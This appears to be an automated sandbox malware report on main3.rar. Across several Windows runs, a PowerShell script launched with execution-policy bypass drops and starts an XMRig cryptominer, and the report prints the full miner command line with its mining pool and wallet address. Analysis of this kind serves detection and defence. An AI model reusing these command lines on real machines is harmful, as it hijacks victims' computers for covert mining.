Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-04 03:15
Signatures
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win11-20240611-en
Max time kernel
1799s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3560 wrote to memory of 2816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3560 wrote to memory of 2816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/3560-0-0x00007FF9A5473000-0x00007FF9A5475000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ryp13uya.yyy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3560-6-0x000002130D050000-0x000002130D072000-memory.dmp
memory/3560-10-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp
memory/3560-11-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp
memory/3560-12-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp
memory/3560-14-0x00000213258B0000-0x00000213258C2000-memory.dmp
memory/3560-15-0x0000021325890000-0x000002132589A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:21
Platform
win10v2004-20240611-en
Max time kernel
1791s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4176 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4176 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/4176-0-0x00007FFEDEBB3000-0x00007FFEDEBB5000-memory.dmp
memory/4176-6-0x000001F955CB0000-0x000001F955CD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gcjptdi4.pmo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4176-11-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/4176-12-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/4176-14-0x00007FFEDEBB0000-0x00007FFEDF671000-memory.dmp
memory/4176-15-0x000001F956A80000-0x000001F956A92000-memory.dmp
memory/4176-16-0x000001F956A60000-0x000001F956A6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1256 wrote to memory of 2988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1256 wrote to memory of 2988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4252,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4132,i,11049150160560877369,2866371920339304689,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/1256-0-0x00007FFC78DF3000-0x00007FFC78DF5000-memory.dmp
memory/1256-10-0x00000138C8C10000-0x00000138C8C32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wztumpec.2w0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1256-11-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/1256-12-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/1256-14-0x00007FFC78DF0000-0x00007FFC798B1000-memory.dmp
memory/1256-15-0x00000138CAF80000-0x00000138CAF92000-memory.dmp
memory/1256-16-0x00000138C8C60000-0x00000138C8C6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2988-117-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
memory/2988-118-0x00007FF601BA0000-0x00007FF6027D3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:56
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2760 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2760 wrote to memory of 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3808,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4288,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:8
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mh4zoot1.q4v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:17
Platform
win10-20240611-en
Max time kernel
1797s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3424 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3424 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1zw45q2m.i2w.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:21
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2324 wrote to memory of 2928 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2324 wrote to memory of 2928 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_drkuklcu.jap.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
